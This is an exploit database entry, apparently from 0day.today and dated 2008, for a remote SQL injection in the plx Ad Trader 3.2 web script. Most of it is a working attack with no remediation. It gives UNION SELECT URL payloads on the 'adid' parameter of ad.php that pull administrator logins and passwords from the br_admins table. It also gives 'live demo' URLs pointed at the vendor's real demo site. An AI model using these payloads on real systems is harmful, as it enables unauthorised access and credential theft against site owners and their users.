plx Ad Trader 3.2 (adid) Remote SQL Injection Vulnerability

2008-07-01T00:00:00
ID 1337DAY-ID-3340
Type zdt
Reporter Hussin X
Modified 2008-07-01T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===========================================================
plx Ad Trader 3.2 (adid) Remote SQL Injection Vulnerability
===========================================================



@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@     plx Ad Trader v3.2  SQL Injection Vulnerability
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@    Author: Hussin X                                   @
@                                                       @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@    
@
@    HomE script : http://plxwebdev.com
@
@    DeMo        : http://plxwebdev.com/demos/plxadtrader                              
@                                                      
@                                                      
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@
@
@
@

ExPloiT :

www.[target].com/Script/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+concat_ws(0x3a,login,pass)+from+br_admins-- 



L!VE DEMO :

USER

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+login+from+br_admins--

PASSWORD

http://plxwebdev.com/demos/plxadtrader/ad.php?s=redir&f=siteurl&adid=-12+UNION+SELECT+pass+from+br_admins--



#  0day.today [2018-03-01]  #